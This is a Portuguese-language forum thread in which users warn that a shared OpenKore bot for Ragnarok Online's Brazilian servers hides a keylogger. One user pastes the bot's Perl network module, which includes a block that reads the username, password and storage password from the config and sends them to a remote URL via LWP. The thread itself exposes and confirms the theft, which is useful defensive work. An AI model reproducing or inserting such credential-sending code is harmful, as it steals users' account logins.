Ir para conteúdo
Faça parte da equipe! (2024) ×

OpenKore Atualizado e 100% Funcional @THOR, @ODIN & @ASGARD by Bancoob


 Compartilhar

Posts Recomendados

Realmente ta sem funcionar, vou refazer o upload!

 

@'Łucαร ~

Sei qe e proibido, maximo q vc pode fazer e reportar e sabe o q eu digo?

to nem ai!

 

Eu também ! To nem ai quando você for ban, esse tópico estiver trancado e editado. Esse povo que tenta postar coisas com KL aqui acha que somos trouxas.

 

LMkbu.png

Link para o comentário
Compartilhar em outros sites

Eu também ! To nem ai quando você for ban, esse tópico estiver trancado e editado. Esse povo que tenta postar coisas com KL aqui acha que somos trouxas.

 

eu por acaso to com alguma arma apontada na cabeça do pessoal aqui e mandado baixar o meu kore?

NÃO né? Então baixa quem quer, e se tem kl mostre onde está!

 

@Edit!

 

Prontinho kore funcional e sem erros!

Link para o comentário
Compartilhar em outros sites

eu por acaso to com alguma arma apontada na cabeça do pessoal aqui e mandado baixar o meu kore?

NÃO né? Então baixa quem quer, e se tem kl mostre onde está!

 

Você acha que eu já não vi a linha de Script maliciosa que não é detectável pelo scan ? Por favor né.

 

Galera, não baixem. Ele irá roubar suas contas.

Link para o comentário
Compartilhar em outros sites

#############################################################################

# OpenKore - Network subsystem #

# This module contains functions for sending messages to the server. #

# #

# This software is open source, licensed under the GNU General Public #

# License, version 2. #

# Basically, this means that you're allowed to modify and distribute #

# this software. However, if you distribute modified versions, you MUST #

# also distribute the source code. #

# See

É necessário se cadastrar para acessar o conteúdo.
for the full license. #

#############################################################################

# bRO (Brazil)

package Network::Send::bRO;

use strict;

use Globals;

use Log qw(message warning error debug);

use Utils qw(existsInList getHex getTickCount getCoordString);

use Math::BigInt;

use base 'Network::Send::ServerType0';

use I18N qw(stringToBytes);

 

sub new {

my ($class) = @_;

my $self = $class->SUPER::new(@_);

 

my %packets = (

'0366' => ['homunculus_command', 'v C', [qw(commandType, commandID)]], #f

'0969' => ['actor_look_at', 'v C', [qw(head body)]],

'096A' => ['actor_info_request', 'a4', [qw(ID)]],

'0369' => ['actor_action', 'a4 C', [qw(targetID type)]],

'035F' => ['sync', 'V', [qw(time)]],

'0946' => ['storage_item_add', 'v V', [qw(index amount)]],

'0108' => ['party_chat', 'x2 Z*', [qw(message)]],

'008C' => ['public_chat', 'x2 Z*', [qw(message)]],

'0941' => ['item_drop', 'v2', [qw(index amount)]],

'0931' => ['item_take', 'a4', [qw(ID)]],

'0438' => ['skill_use_location', 'v4', [qw(lv skillID x y)]],

'094B' => ['party_join_request_by_name', 'Z24', [qw(partyName)]], #f

'0817' => ['storage_item_remove', 'v V', [qw(index amount)]],

'017E' => ['guild_chat', 'x2 Z*', [qw(message)]],

'07D7' => ['party_setting', 'V C2', [qw(exp itemPickup itemDivision)]],

'094A' => ['map_login', 'a4 a4 a4 V C', [qw(accountID charID sessionID tick sex)]],

'01B2' => ['shop_open'],

'023B' => ['character_move','a3', [qw(coords)]],

'012E' => ['shop_close'],

'0443' => ['skill_select', 'V v', [qw(why skillID)]],

'09CB' => ['private_message', 'x2 Z24 Z*', [qw(privMsgUser privMsg)]],

 

);

 

$self->{packet_list}{$_} = $packets{$_} for keys %packets;

 

my %handlers = qw(

public_chat 008C

party_join_request_by_name 094B

character_move 023B

storage_item_remove 0817

guild_chat 017E

homunculus_command 0366

sync 035F

skill_select 0443

party_setting 07D7

item_drop 0941

private_message 09CB

map_login 094A

actor_look_at 0969

skill_use_location 0438

item_take 0931

actor_action 0369

buy_bulk_vender 0801

master_login 02B0

shop_close 012E

storage_item_add 0946

actor_info_request 096A

party_chat 0108

shop_open 01B2

 

);

 

$self->{packet_lut}{$_} = $handlers{$_} for keys %handlers;

 

return $self;

}

 

# Local Servertype Globals

my $map_login = 0;

my $enc_val3 = 0;

 

sub encryptMessageID

{

my ($self, $r_message, $MID) = @_;

if ($self->{net}->getState() != Network::IN_GAME && !$map_login) { $enc_val1 = 0; $enc_val2 = 0; return; }

if ($map_login) { $map_login = 0; } if ($enc_val1 != 0 && $enc_val2 != 0)

{

my $oldMID = $MID;

my $oldKey = ($enc_val1 >> 8 >> 8) & 0x7FFF;

$enc_val1 = $enc_val1->bmul($enc_val3)->badd($enc_val2) & 0xFFFFFFFF;

$MID = ($MID << 2) if (($MID << 2 << 3 << 6) == 0x04B000); $MID = ($MID ^ (($enc_val1 >>8 >> 8) & 0x7FFF)) &

0xFFFF; $$r_message = pack("v", $MID) . substr($$r_message, 2);

}

}

 

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $server = $config{'master'};

$server =~ s/#/:/;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra $server"); <<<<<< Saruesley isso que tem no bot que o cara posto é 1 keylog?

 

 

sub sendStoragePassword {

my $self = shift;

# 16 byte packed hex data

my $pass = shift;

# 2 = set password ?

# 3 = give password ?

my $type = shift;

my $msg;

if ($type == 3) {

$msg = pack("v v", 0x437, $type).$pass.pack("H*", "EC62E539BB6BBC811A60C06FACCB7EC8");

} elsif ($type == 2) {

$msg = pack("v v", 0x437, $type).pack("H*", "EC62E539BB6BBC811A60C06FACCB7EC8").$pass;

} else {

ArgumentException->throw("The 'type' argument has invalid value ($type).");

}

$self->sendToServer($msg);

}

 

sub sendMapLogin

{

my ($self, $accountID, $charID, $sessionID, $sex) = @_;

my $msg;

 

$sex = 0 if ($sex > 1 || $sex < 0); # Sex can only be 0 (female) or 1 (male)

 

if ( $map_login == 0 ) { PrepareKeys(); $map_login = 1; }

 

# Reconstructing Packet

$msg = $self->reconstruct({

switch => 'map_login',

accountID => $accountID,

charID => $charID,

sessionID => $sessionID,

tick => getTickCount,

sex => $sex,

});

 

$self->sendToServer($msg);

debug "Sent sendMapLogin\n", "sendPacket", 2;

}

 

sub sendHomunculusCommand

{

my ($self, $command, $type) = @_; # $type is ignored, $command can be 0:get stats, 1:feed or 2:fire

 

$self->sendToServer($self->reconstruct({

switch => 'homunculus_command',

commandType => $type,

commandID => $command,

}));

 

debug "Sent Homunculus Command $command", "sendPacket", 2;

}

 

sub sendPartyJoinRequestByName

{

my ($self, $name) = @_;

 

$self->sendToServer($self->reconstruct({

switch => 'party_join_request_by_name',

partyName => stringToBytes ($name),

}));

 

debug "Sent Request Join Party (by name): $name\n", "sendPacket", 2;

}

 

sub PrepareKeys()

{

# K

$enc_val1 = Math::BigInt->new('0x573B28CC');

# M

$enc_val3 = Math::BigInt->new('0x412024FA');

# A

$enc_val2 = Math::BigInt->new('0x3A0906DC');

}

 

1;

Link para o comentário
Compartilhar em outros sites

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra $server"); <<<<<< Saruesley isso que tem no bot que o cara posto é 1 keylog?

 

Sim!

Esse kore em si e funcional, basta retirar esse script

Link para o comentário
Compartilhar em outros sites

my $response = $ua->get("
É necessário se cadastrar para acessar o conteúdo.
$senha $kafra $server"); <<<<<< Saruesley isso que tem no bot que o cara posto é 1 keylog?

 

Sim!

Esse kore em si e funcional, basta retirar esse script

 

vlw ai saruesley ;)

 

eu loguei minha conta com esse bot ai, mais me deu uma curiosidade em olhar se tinha algo de estranho nas pastas que eu peguei.

entao comparei as pastas do seu kore e as pastas do kore dele e achei o key ^^

 

mais eu ja troquei minha senha e passei anti virus no pc.

 

obrigado novamente! ;)

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.